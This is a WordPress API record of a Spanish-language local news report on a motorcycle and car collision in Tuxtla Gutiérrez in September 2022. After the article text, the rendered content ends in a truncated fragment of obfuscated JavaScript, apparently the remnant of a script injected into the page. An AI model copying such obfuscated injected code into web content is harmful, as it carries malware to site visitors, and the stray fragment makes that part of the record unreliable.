{"id":5248,"date":"2022-09-20T23:22:11","date_gmt":"2022-09-20T23:22:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5248"},"modified":"2022-09-20T23:23:11","modified_gmt":"2022-09-20T23:23:11","slug":"motociclista-y-coche-particular-protagonizan-accidente","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5248","title":{"rendered":"Motociclista y coche particular protagonizan accidente"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0019-1024x576.jpg\" alt=\"\" class=\"wp-image-5251\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0019-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0019-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0019-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0019-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220920-WA0019.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> Jairo Camacho.Agencia ReporteCiudadano, 20 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Un motociclista y un coche particular protagonizaron un fuerte accidente de tr\u00e1nsito este martes en la Calzada Caminera, en la zona Oriente de Tuxtla Guti\u00e9rrez.Este accidente ocurri\u00f3 cuando el tripulante de una moto Bajab pulsar de color rojo circulaba en el carril de Sur a Norte y al llegar a la altura de la 9a Sur y Caminera se estrell\u00f3 contra un Chrysler Ne\u00f3n de color negro al momento de girar hacia su derecha.El conductor del Ne\u00f3n en su defensa dijo que tambi\u00e9n gir\u00f3 a la derecha y no se percat\u00f3 de la moto.Por el golpe en el costado del coche el motociclista sali\u00f3 volando y se estrell\u00f3 contra el pavimento.En el lugar los involucrados llegaron a un acuerdo econ\u00f3mico y finalmente se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 20 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Un motociclista y un coche particular protagonizaron un fuerte accidente de tr\u00e1nsito este martes en la Calzada Caminera, en la zona Oriente de Tuxtla Guti\u00e9rrez.Este accidente ocurri\u00f3 cuando el tripulante de una moto Bajab pulsar de color rojo circulaba en el carril de Sur a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5251,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5248","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5248"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5248\/revisions"}],"predecessor-version":[{"id":5252,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5248\/revisions\/5252"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5251"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5248"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}